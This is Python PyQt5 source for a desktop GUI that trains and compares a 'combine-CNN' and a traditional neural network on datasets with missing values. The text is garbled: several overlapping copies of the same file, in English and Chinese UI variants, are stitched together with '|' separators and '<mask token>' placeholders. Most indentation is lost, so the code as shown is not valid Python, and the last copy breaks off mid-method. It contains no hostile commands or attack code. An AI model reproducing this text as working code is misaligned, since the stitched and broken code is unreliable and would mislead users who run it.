                reply = QMessageBox.information(self, 'Notice', 'Training is in progress',
QMessageBox.Yes, QMessageBox.Yes)
return
self.showResultW = showResultWidget.ShowResultWidget(
                'traditional NN Prediction Results', self, 'Tra')
return
def showJudge(self):
if self.sender() is self.judgeResultButton:
if self.traingWidgetOnFlag['New']:
                reply = QMessageBox.information(self, 'Notice', 'Training is in progress',
QMessageBox.Yes, QMessageBox.Yes)
return
self.chooseJDWin = (chooseJudgeDataSetWidget.
chooseJudgeDataSetWidget(
                'Choose Dataset for Evaluation', self, 'New'))
elif self.sender() is self.judgeResultButtonT:
if self.traingWidgetOnFlag['Tra']:
                reply = QMessageBox.information(self, 'Notice', 'Training is in progress',
QMessageBox.Yes, QMessageBox.Yes)
return
self.chooseJDWin = (chooseJudgeDataSetWidget.
chooseJudgeDataSetWidget(
                'Choose Dataset for Evaluation', self, 'Tra'))
<mask token>
| <mask token>
class MyMainWindow(QMainWindow):
def __init__(self):
super().__init__()
self.windowLength = 1250
self.windowHigh = 900
self.fname = dict()
self.fname['New'] = None
self.fname['Tra'] = None
self.dataLossRate = dict()
self.dataSetLossValue = dict()
self.dataFor = dict()
self.dataFor['New'] = None
self.dataLossRate['New'] = 0.0
self.dataSetLossValue['New'] = 0.0
self.dataFor['Tra'] = None
self.dataLossRate['Tra'] = 0.0
self.dataSetLossValue['Tra'] = 0.0
self.traingWidgetOnFlag = dict()
self.traingWidgetOnFlag['New'] = False
self.traingWidgetOnFlag['Tra'] = False
self.combineNumConv = 2
self.convCoreNum = 5
self.combineNumPooling = 4
self.fullConnectOutInRate = 0.5
self.mcbcnn = None
self.trann = None
self.trainingW = None
self.trainingWT = None
self.initUI()
self.initConnect()
def initUI(self):
self.statusBar().showMessage('Ready')
dataModule = QVBoxLayout()
        self.dataFileChooseButton = QPushButton('Choose Data')
        self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))
        self.dataLossSimulateSettingButton = QPushButton('Set Missing-Data Parameters')
        self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))
        self.dataShowButton = QPushButton('Show Data')
        self.dataShowButton.setFont(QFont('微软雅黑', 16))
label = QLabel('Present Data:')
label.setFont(QFont('微软雅黑', 16))
self.presentDataName = QLabel('None')
self.presentDataName.setFont(QFont('微软雅黑', 16))
labelbox = QVBoxLayout()
labelbox.addWidget(label)
labelbox.addWidget(self.presentDataName)
dataModule.addStretch(1)
dataModule.addLayout(labelbox)
dataModule.addStretch(1)
dataModule.addWidget(self.dataFileChooseButton)
dataModule.addStretch(1)
dataModule.addWidget(self.dataLossSimulateSettingButton)
dataModule.addStretch(1)
dataModule.addWidget(self.dataShowButton)
dataModule.addStretch(1)
trainingModule = QVBoxLayout()
self.setModelParametersButton = QPushButton('Model Parameters')
self.setModelParametersButton.setFont(QFont('微软雅黑', 16))
self.trainingButton = QPushButton('Training')
self.trainingButton.setFont(QFont('微软雅黑', 16))
self.saveModelButton = QPushButton('Save Model')
self.saveModelButton.setFont(QFont('微软雅黑', 16))
self.loadModelButton = QPushButton('Load Model')
self.loadModelButton.setFont(QFont('微软雅黑', 16))
label = QLabel('Present Model:')
label.setFont(QFont('微软雅黑', 16))
self.presentModelName = QLabel('None')
self.presentModelName.setFont(QFont('微软雅黑', 16))
labelbox = QVBoxLayout()
labelbox.addWidget(label)
labelbox.addWidget(self.presentModelName)
trainingModule.addStretch(1)
trainingModule.addLayout(labelbox)
trainingModule.addStretch(1)
trainingModule.addWidget(self.setModelParametersButton)
trainingModule.addStretch(1)
trainingModule.addWidget(self.trainingButton)
trainingModule.addStretch(1)
trainingModule.addWidget(self.saveModelButton)
trainingModule.addStretch(1)
trainingModule.addWidget(self.loadModelButton)
trainingModule.addStretch(1)
resultShowModule = QVBoxLayout()
        self.showResultButton = QPushButton('Show Classification Results')
        self.showResultButton.setFont(QFont('微软雅黑', 16))
        self.judgeResultButton = QPushButton('Evaluate Classification Results')
        self.judgeResultButton.setFont(QFont('微软雅黑', 16))
resultShowModule.addWidget(self.showResultButton)
resultShowModule.addWidget(self.judgeResultButton)
hboxTop = QHBoxLayout()
hboxTop.addStretch(1)
mcnnLabel = QLabel('Combine-CNN:')
mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))
hboxTop.addWidget(mcnnLabel)
hboxTop.addStretch(1)
hboxTop.addLayout(dataModule)
hboxTop.addStretch(1)
hboxTop.addLayout(trainingModule)
hboxTop.addStretch(1)
hboxTop.addLayout(resultShowModule)
hboxTop.addStretch(1)
dataModuleT = QVBoxLayout()
        self.dataFileChooseButtonT = QPushButton('Choose Data')
        self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))
        self.dataLossSimulateSettingButtonT = QPushButton('Set Missing-Data Parameters')
        self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))
        self.dataPreProcessButtonT = QPushButton('Preprocess Data')
        self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))
        self.dataShowButtonT = QPushButton('Show Data')
        self.dataShowButtonT.setFont(QFont('微软雅黑', 16))
label = QLabel('Present Data:')
label.setFont(QFont('微软雅黑', 16))
self.presentDataNameT = QLabel('None')
self.presentDataNameT.setFont(QFont('微软雅黑', 16))
labelbox = QVBoxLayout()
labelbox.addWidget(label)
labelbox.addWidget(self.presentDataNameT)
dataModuleT.addStretch(1)
dataModuleT.addLayout(labelbox)
dataModuleT.addStretch(1)
dataModuleT.addWidget(self.dataFileChooseButtonT)
dataModuleT.addStretch(1)
dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)
dataModuleT.addStretch(1)
dataModuleT.addWidget(self.dataPreProcessButtonT)
dataModuleT.addStretch(1)
dataModuleT.addWidget(self.dataShowButtonT)
dataModuleT.addStretch(1)
trainingModuleT = QVBoxLayout()
self.setModelParametersButtonT = QPushButton('Model Parameters')
self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))
self.trainingButtonT = QPushButton('Training')
self.trainingButtonT.setFont(QFont('微软雅黑', 16))
self.saveModelButtonT = QPushButton('Save Model')
self.saveModelButtonT.setFont(QFont('微软雅黑', 16))
self.loadModelButtonT = QPushButton('Load Model')
self.loadModelButtonT.setFont(QFont('微软雅黑', 16))
label = QLabel('Present Model:')
label.setFont(QFont('微软雅黑', 16))
self.presentModelNameT = QLabel('None')
self.presentModelNameT.setFont(QFont('微软雅黑', 16))
labelbox = QVBoxLayout()
labelbox.addWidget(label)
labelbox.addWidget(self.presentModelNameT)
trainingModuleT.addStretch(1)
trainingModuleT.addLayout(labelbox)
trainingModuleT.addStretch(1)
trainingModuleT.addWidget(self.setModelParametersButtonT)
trainingModuleT.addStretch(1)
trainingModuleT.addWidget(self.trainingButtonT)
trainingModuleT.addStretch(1)
trainingModuleT.addWidget(self.saveModelButtonT)
trainingModuleT.addStretch(1)
trainingModuleT.addWidget(self.loadModelButtonT)
trainingModuleT.addStretch(1)
resultShowModuleT = QVBoxLayout()
        self.showResultButtonT = QPushButton('Show Classification Results')
        self.showResultButtonT.setFont(QFont('微软雅黑', 16))
        self.judgeResultButtonT = QPushButton('Evaluate Classification Results')
        self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))
resultShowModuleT.addWidget(self.showResultButtonT)
resultShowModuleT.addWidget(self.judgeResultButtonT)
hboxBottom = QHBoxLayout(self)
hboxBottom.addStretch(1)
traditionNNLabel = QLabel('Traditional NN:')
traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))
hboxBottom.addWidget(traditionNNLabel)
hboxBottom.addStretch(1)
hboxBottom.addLayout(dataModuleT)
hboxBottom.addStretch(1)
hboxBottom.addLayout(trainingModuleT)
hboxBottom.addStretch(1)
hboxBottom.addLayout(resultShowModuleT)
hboxBottom.addStretch(1)
splitterLine = QLabel(self)
splitterLine.setFont(QFont('Times', 1))
col = QColor(0, 0, 0)
splitterLine.setStyleSheet('QWidget { background-color: %s }' % col
.name())
splitterLine.resize(splitterLine.sizeHint())
vbox = QVBoxLayout()
vbox.addLayout(hboxTop)
vbox.addWidget(splitterLine)
vbox.addLayout(hboxBottom)
mainWidget = QWidget()
mainWidget.setLayout(vbox)
self.setCentralWidget(mainWidget)
self.setGeometry(350, 100, self.windowLength, self.windowHigh)
        self.setWindowTitle('Neural Network System for Datasets with Missing Values')
self.show()
def initConnect(self):
self.dataFileChooseButton.clicked.connect(self.chooseData)
self.dataFileChooseButtonT.clicked.connect(self.chooseData)
self.dataLossSimulateSettingButton.clicked.connect(self.
setLossParameter)
self.dataLossSimulateSettingButtonT.clicked.connect(self.
setLossParameter)
self.dataShowButton.clicked.connect(self.showData)
self.dataShowButtonT.clicked.connect(self.showData)
self.dataPreProcessButtonT.clicked.connect(self.preProcess)
self.setModelParametersButton.clicked.connect(self.setModelParameters)
self.setModelParametersButtonT.clicked.connect(self.setModelParameters)
self.trainingButton.clicked.connect(self.training)
self.trainingButtonT.clicked.connect(self.training)
self.saveModelButton.clicked.connect(self.saveModel)
self.saveModelButtonT.clicked.connect(self.saveModel)
self.loadModelButton.clicked.connect(self.loadModel)
self.loadModelButtonT.clicked.connect(self.loadModel)
self.showResultButton.clicked.connect(self.showResult)
self.showResultButtonT.clicked.connect(self.showResult)
self.judgeResultButton.clicked.connect(self.showJudge)
self.judgeResultButtonT.clicked.connect(self.showJudge)
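    # Data flow: chooseData() pops the file dialog, then hands off to
    # loadData(), which parses the chosen .txt file under the current
    # loss-simulation settings (dataLossRate / dataSetLossValue).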
def chooseData(self):
if self.sender() is self.dataFileChooseButton:
self.fname['New'], ok = QFileDialog.getOpenFileName(self,
'Open file', '..', 'Text files (*.txt)')
if ok:
self.loadData()
elif self.sender() is self.dataFileChooseButtonT:
self.fname['Tra'], ok = QFileDialog.getOpenFileName(self,
'Open file', '..', 'Text files (*.txt)')
if ok:
self.loadData()
return
def loadData(self):
if self.sender() is self.dataFileChooseButton:
try:
self.dataFor['New'] = myLoadData.loadData(self.fname['New'],
self.dataLossRate['New'], self.dataSetLossValue['New'])
except FileNotFoundError as e:
reply = QMessageBox.information(self, 'Message',
'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)
return
except Exception:
reply = QMessageBox.information(self, 'Message',
'Data file format error', QMessageBox.Yes, QMessageBox.Yes)
return
dataname = self.fname['New'].split('/')[-1].split('.')[0]
self.presentDataName.setText(dataname)
self.presentDataName.resize(self.presentDataName.sizeHint())
elif self.sender() is self.dataFileChooseButtonT:
try:
self.dataFor['Tra'] = myLoadData.loadData(self.fname['Tra'],
self.dataLossRate['Tra'], self.dataSetLossValue['Tra'])
except FileNotFoundError as e:
reply = QMessageBox.information(self, 'Message',
'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)
return
except Exception:
reply = QMessageBox.information(self, 'Message',
'Data file format error', QMessageBox.Yes, QMessageBox.Yes)
return
dataname = self.fname['Tra'].split('/')[-1].split('.')[0]
self.presentDataNameT.setText(dataname)
self.presentDataNameT.resize(self.presentDataNameT.sizeHint())
return
def setLossParameter(self):
if self.sender() is self.dataLossSimulateSettingButton:
self.setLPDialog = setLossParameterDialog.setLossParameterDialog(
'combine-CNN设置缺失参数', self, 'New')
elif self.sender() is self.dataLossSimulateSettingButtonT:
self.setLPDialog = setLossParameterDialog.setLossParameterDialog(
'traditional NN设置缺失参数', self, 'Tra')
return
def showData(self):
if self.sender() is self.dataShowButton:
self.showDataW = showDataWidget.ShowDataWidget('combine-CNN数据展示',
self, 'New')
elif self.sender() is self.dataShowButtonT:
            self.showDataW = showDataWidget.ShowDataWidget('traditional NN数据展示', self, 'Tra')
return
def preProcess(self):
if self.dataFor['Tra'] is None:
reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法预处理',
QMessageBox.Yes, QMessageBox.Yes)
else:
self.dataFor['Tra'].MeanPreProcess()
reply = QMessageBox.information(self, 'Message',
'PreProcess succeed!', QMessageBox.Yes, QMessageBox.Yes)
return
    def setModelParameters(self):
        if self.sender() is self.setModelParametersButton:
            self.setModelParaW = setModelParametersDialog.setLossParameterDialog(
                'combine-CNN模型参数设置', self, 'New')
        elif self.sender() is self.setModelParametersButtonT:
            self.setModelParaW = setModelParametersDialog.setLossParameterDialog(
                'traditional NN模型参数设置', self, 'Tra')
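    # The two training pipelines are mutually exclusive: each branch below
    # refuses to start while the other pipeline's training window exists.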
def training(self):
if self.sender() is self.trainingButton:
if self.trainingW is not None:
self.trainingW.hide()
self.trainingW.show()
return
senderName = 'New'
elif self.sender() is self.trainingButtonT:
if self.trainingWT is not None:
self.trainingWT.hide()
                self.trainingWT.show()
                return
senderName = 'Tra'
if self.dataFor[senderName] is None:
reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法训练',
QMessageBox.Yes, QMessageBox.Yes)
return
elif senderName == 'New':
            if self.dataFor[senderName].DataTrainX.shape[1] < self.combineNumConv:
reply = QMessageBox.information(self, '参数错误',
'卷积层组合(卷积核)大小大于数据集特征数量', QMessageBox.Yes, QMessageBox.Yes)
return
            if combineNumCalculate.combineNumCal(self.dataFor[senderName].DataTrainX.shape[1],
                    self.combineNumConv) < self.combineNumPooling:
reply = QMessageBox.information(self, '参数错误',
'池化层组合(池化核)大小大于卷积层输出特征向量维度', QMessageBox.Yes,
QMessageBox.Yes)
return
if self.trainingWT is not None:
reply = QMessageBox.information(self, '提示',
'traditional NN训练正在进行,请等待其结束', QMessageBox.Yes,
QMessageBox.Yes)
return
self.trainingW = TrainingWidget.trainningWidget('combine-CNN训练',
self, senderName)
self.traingWidgetOnFlag[senderName] = False
elif senderName == 'Tra':
if self.trainingW is not None:
reply = QMessageBox.information(self, '提示',
'combine-CNN训练正在进行,请等待其结束', QMessageBox.Yes,
QMessageBox.Yes)
return
            self.trainingWT = TrainingWidget.trainningWidget('traditional NN训练', self, senderName)
self.traingWidgetOnFlag[senderName] = False
return
def saveModel(self):
if self.sender() is self.saveModelButton:
if self.mcbcnn is None:
reply = QMessageBox.information(self, '模型错误', '模型不存在',
QMessageBox.Yes, QMessageBox.Yes)
return
else:
fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',
'..\\myCombineCNN.cbcnn.json',
'Combine-CNN json files (*.cbcnn.json)')
if ok:
succeed = self.mcbcnn.saveModel(fname)
if succeed:
reply = QMessageBox.information(self, '保存结果',
'模型保存成功', QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '保存结果',
'模型保存失败', QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '保存结果', '模型保存失败',
QMessageBox.Yes, QMessageBox.Yes)
elif self.sender() is self.saveModelButtonT:
if self.trann is None:
reply = QMessageBox.information(self, '模型错误', '模型不存在',
QMessageBox.Yes, QMessageBox.Yes)
return
else:
fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',
'..\\traditionalNN.trann.json',
'Traditional NN json files (*.trann.json)')
if ok:
succeed = self.trann.saveModel(fname)
if succeed:
reply = QMessageBox.information(self, '保存结果',
'模型保存成功', QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '保存结果',
'模型保存失败', QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '保存结果', '模型保存失败',
QMessageBox.Yes, QMessageBox.Yes)
def loadModel(self):
if self.sender() is self.loadModelButton:
fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',
'..', 'Combine-CNN json files (*.cbcnn.json)')
if ok:
if self.mcbcnn is None:
                    self.mcbcnn = myCombineCNN.myCombineCNN(None, self.combineNumConv,
                        self.convCoreNum, self.combineNumPooling)
succeed = self.mcbcnn.setModel(fname)
if succeed:
modelName = fname.split('/')[-1].split('.')[0]
self.presentModelName.setText(modelName)
reply = QMessageBox.information(self, '设置结果', '模型设置成功',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '设置结果', '模型设置失败',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '设置结果', '模型设置失败',
QMessageBox.Yes, QMessageBox.Yes)
elif self.sender() is self.loadModelButtonT:
fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',
'..', 'Traditional NN json files (*.trann.json)')
if ok:
if self.trann is None:
self.trann = traditionalNN.traditionalNN(None)
succeed = self.trann.setModel(fname)
if succeed:
modelName = fname.split('/')[-1].split('.')[0]
self.presentModelNameT.setText(modelName)
reply = QMessageBox.information(self, '设置结果', '模型设置成功',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '设置结果', '模型设置失败',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '设置结果', '模型设置失败',
QMessageBox.Yes, QMessageBox.Yes)
return
def showResult(self):
if self.sender() is self.showResultButton:
if self.traingWidgetOnFlag['New']:
reply = QMessageBox.information(self, '提示', '训练正在进行',
QMessageBox.Yes, QMessageBox.Yes)
return
self.showResultW = showResultWidget.ShowResultWidget(
'combine-CNN预测结果展示', self, 'New')
elif self.sender() is self.showResultButtonT:
if self.traingWidgetOnFlag['Tra']:
reply = QMessageBox.information(self, '提示', '训练正在进行',
QMessageBox.Yes, QMessageBox.Yes)
return
self.showResultW = showResultWidget.ShowResultWidget(
'traditional NN预测结果展示', self, 'Tra')
return
def showJudge(self):
if self.sender() is self.judgeResultButton:
if self.traingWidgetOnFlag['New']:
reply = QMessageBox.information(self, '提示', '训练正在进行',
QMessageBox.Yes, QMessageBox.Yes)
return
            self.chooseJDWin = chooseJudgeDataSetWidget.chooseJudgeDataSetWidget(
                'Choose Judgement-based-on Data Set', self, 'New')
elif self.sender() is self.judgeResultButtonT:
if self.traingWidgetOnFlag['Tra']:
reply = QMessageBox.information(self, '提示', '训练正在进行',
QMessageBox.Yes, QMessageBox.Yes)
return
            self.chooseJDWin = chooseJudgeDataSetWidget.chooseJudgeDataSetWidget(
                'Choose Judgement-based-on Data Set', self, 'Tra')
if __name__ == '__main__':
    app = QApplication(sys.argv)
    myMainWindow = MyMainWindow()
    sys.exit(app.exec_())
| import sys
from PyQt5.QtWidgets import QMainWindow, QWidget, QHBoxLayout, QVBoxLayout, QFrame, QSplitter, QStyleFactory, QApplication, QPushButton, QTextEdit, QLabel, QFileDialog, QMessageBox
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QFont, QColor
import myLoadData
from UIPack import setLossParameterDialog, showDataWidget, setModelParametersDialog, TrainingWidget, showResultWidget, showJudgeWidgets, chooseJudgeDataSetWidget
from MyCombCNNPack import combineNumCalculate, myCombineCNN, traditionalNN, Judgement
class MyMainWindow(QMainWindow):
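    # Main window: the top panel drives the combine-CNN pipeline (keyed
    # 'New'), the bottom panel the traditional-NN baseline (keyed 'Tra');
    # the per-pipeline state dicts below use those two keys throughout.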
def __init__(self):
super().__init__()
self.windowLength = 1250
self.windowHigh = 900
self.fname = dict()
self.fname['New'] = None
self.fname['Tra'] = None
self.dataLossRate = dict()
self.dataSetLossValue = dict()
self.dataFor = dict()
self.dataFor['New'] = None
self.dataLossRate['New'] = 0.0
self.dataSetLossValue['New'] = 0.0
self.dataFor['Tra'] = None
self.dataLossRate['Tra'] = 0.0
self.dataSetLossValue['Tra'] = 0.0
self.traingWidgetOnFlag = dict()
self.traingWidgetOnFlag['New'] = False
self.traingWidgetOnFlag['Tra'] = False
self.combineNumConv = 2
self.convCoreNum = 5
self.combineNumPooling = 4
self.fullConnectOutInRate = 0.5
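        # Presumably the out/in size ratio of the fully connected layer; it
        # is not referenced elsewhere in this file, so the parameter dialog
        # or model code is assumed to consume it.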
self.mcbcnn = None
self.trann = None
self.trainingW = None
self.trainingWT = None
self.initUI()
self.initConnect()
def initUI(self):
self.statusBar().showMessage('Ready')
dataModule = QVBoxLayout()
self.dataFileChooseButton = QPushButton('选择数据')
self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))
self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')
self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))
self.dataShowButton = QPushButton('展示数据')
self.dataShowButton.setFont(QFont('微软雅黑', 16))
label = QLabel('Present Data:')
label.setFont(QFont('微软雅黑', 16))
self.presentDataName = QLabel('None')
self.presentDataName.setFont(QFont('微软雅黑', 16))
labelbox = QVBoxLayout()
labelbox.addWidget(label)
labelbox.addWidget(self.presentDataName)
dataModule.addStretch(1)
dataModule.addLayout(labelbox)
dataModule.addStretch(1)
dataModule.addWidget(self.dataFileChooseButton)
dataModule.addStretch(1)
dataModule.addWidget(self.dataLossSimulateSettingButton)
dataModule.addStretch(1)
dataModule.addWidget(self.dataShowButton)
dataModule.addStretch(1)
trainingModule = QVBoxLayout()
self.setModelParametersButton = QPushButton('Model Parameters')
self.setModelParametersButton.setFont(QFont('微软雅黑', 16))
self.trainingButton = QPushButton('Training')
self.trainingButton.setFont(QFont('微软雅黑', 16))
self.saveModelButton = QPushButton('Save Model')
self.saveModelButton.setFont(QFont('微软雅黑', 16))
self.loadModelButton = QPushButton('Load Model')
self.loadModelButton.setFont(QFont('微软雅黑', 16))
label = QLabel('Present Model:')
label.setFont(QFont('微软雅黑', 16))
self.presentModelName = QLabel('None')
self.presentModelName.setFont(QFont('微软雅黑', 16))
labelbox = QVBoxLayout()
labelbox.addWidget(label)
labelbox.addWidget(self.presentModelName)
trainingModule.addStretch(1)
trainingModule.addLayout(labelbox)
trainingModule.addStretch(1)
trainingModule.addWidget(self.setModelParametersButton)
trainingModule.addStretch(1)
trainingModule.addWidget(self.trainingButton)
trainingModule.addStretch(1)
trainingModule.addWidget(self.saveModelButton)
trainingModule.addStretch(1)
trainingModule.addWidget(self.loadModelButton)
trainingModule.addStretch(1)
resultShowModule = QVBoxLayout()
self.showResultButton = QPushButton('分类结果展示')
self.showResultButton.setFont(QFont('微软雅黑', 16))
self.judgeResultButton = QPushButton('分类结果评估')
self.judgeResultButton.setFont(QFont('微软雅黑', 16))
resultShowModule.addWidget(self.showResultButton)
resultShowModule.addWidget(self.judgeResultButton)
hboxTop = QHBoxLayout()
hboxTop.addStretch(1)
mcnnLabel = QLabel('Combine-CNN:')
mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))
hboxTop.addWidget(mcnnLabel)
hboxTop.addStretch(1)
hboxTop.addLayout(dataModule)
hboxTop.addStretch(1)
hboxTop.addLayout(trainingModule)
hboxTop.addStretch(1)
hboxTop.addLayout(resultShowModule)
hboxTop.addStretch(1)
dataModuleT = QVBoxLayout()
self.dataFileChooseButtonT = QPushButton('选择数据')
self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))
self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')
self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))
self.dataPreProcessButtonT = QPushButton('数据预处理')
self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))
self.dataShowButtonT = QPushButton('展示数据')
self.dataShowButtonT.setFont(QFont('微软雅黑', 16))
label = QLabel('Present Data:')
label.setFont(QFont('微软雅黑', 16))
self.presentDataNameT = QLabel('None')
self.presentDataNameT.setFont(QFont('微软雅黑', 16))
labelbox = QVBoxLayout()
labelbox.addWidget(label)
labelbox.addWidget(self.presentDataNameT)
dataModuleT.addStretch(1)
dataModuleT.addLayout(labelbox)
dataModuleT.addStretch(1)
dataModuleT.addWidget(self.dataFileChooseButtonT)
dataModuleT.addStretch(1)
dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)
dataModuleT.addStretch(1)
dataModuleT.addWidget(self.dataPreProcessButtonT)
dataModuleT.addStretch(1)
dataModuleT.addWidget(self.dataShowButtonT)
dataModuleT.addStretch(1)
trainingModuleT = QVBoxLayout()
self.setModelParametersButtonT = QPushButton('Model Parameters')
self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))
self.trainingButtonT = QPushButton('Training')
self.trainingButtonT.setFont(QFont('微软雅黑', 16))
self.saveModelButtonT = QPushButton('Save Model')
self.saveModelButtonT.setFont(QFont('微软雅黑', 16))
self.loadModelButtonT = QPushButton('Load Model')
self.loadModelButtonT.setFont(QFont('微软雅黑', 16))
label = QLabel('Present Model:')
label.setFont(QFont('微软雅黑', 16))
self.presentModelNameT = QLabel('None')
self.presentModelNameT.setFont(QFont('微软雅黑', 16))
labelbox = QVBoxLayout()
labelbox.addWidget(label)
labelbox.addWidget(self.presentModelNameT)
trainingModuleT.addStretch(1)
trainingModuleT.addLayout(labelbox)
trainingModuleT.addStretch(1)
trainingModuleT.addWidget(self.setModelParametersButtonT)
trainingModuleT.addStretch(1)
trainingModuleT.addWidget(self.trainingButtonT)
trainingModuleT.addStretch(1)
trainingModuleT.addWidget(self.saveModelButtonT)
trainingModuleT.addStretch(1)
trainingModuleT.addWidget(self.loadModelButtonT)
trainingModuleT.addStretch(1)
resultShowModuleT = QVBoxLayout()
self.showResultButtonT = QPushButton('分类结果展示')
self.showResultButtonT.setFont(QFont('微软雅黑', 16))
self.judgeResultButtonT = QPushButton('分类结果评估')
self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))
resultShowModuleT.addWidget(self.showResultButtonT)
resultShowModuleT.addWidget(self.judgeResultButtonT)
hboxBottom = QHBoxLayout(self)
hboxBottom.addStretch(1)
traditionNNLabel = QLabel('Traditional NN:')
traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))
hboxBottom.addWidget(traditionNNLabel)
hboxBottom.addStretch(1)
hboxBottom.addLayout(dataModuleT)
hboxBottom.addStretch(1)
hboxBottom.addLayout(trainingModuleT)
hboxBottom.addStretch(1)
hboxBottom.addLayout(resultShowModuleT)
hboxBottom.addStretch(1)
splitterLine = QLabel(self)
splitterLine.setFont(QFont('Times', 1))
col = QColor(0, 0, 0)
        splitterLine.setStyleSheet('QWidget { background-color: %s }' % col.name())
splitterLine.resize(splitterLine.sizeHint())
vbox = QVBoxLayout()
vbox.addLayout(hboxTop)
vbox.addWidget(splitterLine)
vbox.addLayout(hboxBottom)
mainWidget = QWidget()
mainWidget.setLayout(vbox)
self.setCentralWidget(mainWidget)
self.setGeometry(350, 100, self.windowLength, self.windowHigh)
self.setWindowTitle('适用于有缺失值数据集的神经网络系统')
self.show()
def initConnect(self):
self.dataFileChooseButton.clicked.connect(self.chooseData)
self.dataFileChooseButtonT.clicked.connect(self.chooseData)
        self.dataLossSimulateSettingButton.clicked.connect(self.setLossParameter)
        self.dataLossSimulateSettingButtonT.clicked.connect(self.setLossParameter)
self.dataShowButton.clicked.connect(self.showData)
self.dataShowButtonT.clicked.connect(self.showData)
self.dataPreProcessButtonT.clicked.connect(self.preProcess)
self.setModelParametersButton.clicked.connect(self.setModelParameters)
self.setModelParametersButtonT.clicked.connect(self.setModelParameters)
self.trainingButton.clicked.connect(self.training)
self.trainingButtonT.clicked.connect(self.training)
self.saveModelButton.clicked.connect(self.saveModel)
self.saveModelButtonT.clicked.connect(self.saveModel)
self.loadModelButton.clicked.connect(self.loadModel)
self.loadModelButtonT.clicked.connect(self.loadModel)
self.showResultButton.clicked.connect(self.showResult)
self.showResultButtonT.clicked.connect(self.showResult)
self.judgeResultButton.clicked.connect(self.showJudge)
self.judgeResultButtonT.clicked.connect(self.showJudge)
def chooseData(self):
if self.sender() is self.dataFileChooseButton:
self.fname['New'], ok = QFileDialog.getOpenFileName(self,
'Open file', '..', 'Text files (*.txt)')
if ok:
self.loadData()
elif self.sender() is self.dataFileChooseButtonT:
self.fname['Tra'], ok = QFileDialog.getOpenFileName(self,
'Open file', '..', 'Text files (*.txt)')
if ok:
self.loadData()
return
def loadData(self):
if self.sender() is self.dataFileChooseButton:
try:
self.dataFor['New'] = myLoadData.loadData(self.fname['New'],
self.dataLossRate['New'], self.dataSetLossValue['New'])
except FileNotFoundError as e:
reply = QMessageBox.information(self, 'Message',
'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)
return
except Exception:
reply = QMessageBox.information(self, 'Message',
'Data file format error', QMessageBox.Yes, QMessageBox.Yes)
return
dataname = self.fname['New'].split('/')[-1].split('.')[0]
self.presentDataName.setText(dataname)
self.presentDataName.resize(self.presentDataName.sizeHint())
elif self.sender() is self.dataFileChooseButtonT:
try:
self.dataFor['Tra'] = myLoadData.loadData(self.fname['Tra'],
self.dataLossRate['Tra'], self.dataSetLossValue['Tra'])
except FileNotFoundError as e:
reply = QMessageBox.information(self, 'Message',
'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)
return
except Exception:
reply = QMessageBox.information(self, 'Message',
'Data file format error', QMessageBox.Yes, QMessageBox.Yes)
return
dataname = self.fname['Tra'].split('/')[-1].split('.')[0]
self.presentDataNameT.setText(dataname)
self.presentDataNameT.resize(self.presentDataNameT.sizeHint())
return
def setLossParameter(self):
if self.sender() is self.dataLossSimulateSettingButton:
self.setLPDialog = setLossParameterDialog.setLossParameterDialog(
'combine-CNN设置缺失参数', self, 'New')
elif self.sender() is self.dataLossSimulateSettingButtonT:
self.setLPDialog = setLossParameterDialog.setLossParameterDialog(
'traditional NN设置缺失参数', self, 'Tra')
return
def showData(self):
if self.sender() is self.dataShowButton:
self.showDataW = showDataWidget.ShowDataWidget('combine-CNN数据展示',
self, 'New')
elif self.sender() is self.dataShowButtonT:
            self.showDataW = showDataWidget.ShowDataWidget('traditional NN数据展示', self, 'Tra')
return
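    # The traditional NN cannot consume missing values directly, so the data
    # must be imputed first; MeanPreProcess() presumably fills the gaps with
    # per-feature means, judging by its name.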
def preProcess(self):
if self.dataFor['Tra'] is None:
reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法预处理',
QMessageBox.Yes, QMessageBox.Yes)
else:
self.dataFor['Tra'].MeanPreProcess()
reply = QMessageBox.information(self, 'Message',
'PreProcess succeed!', QMessageBox.Yes, QMessageBox.Yes)
return
def setModelParameters(self):
if self.sender() is self.setModelParametersButton:
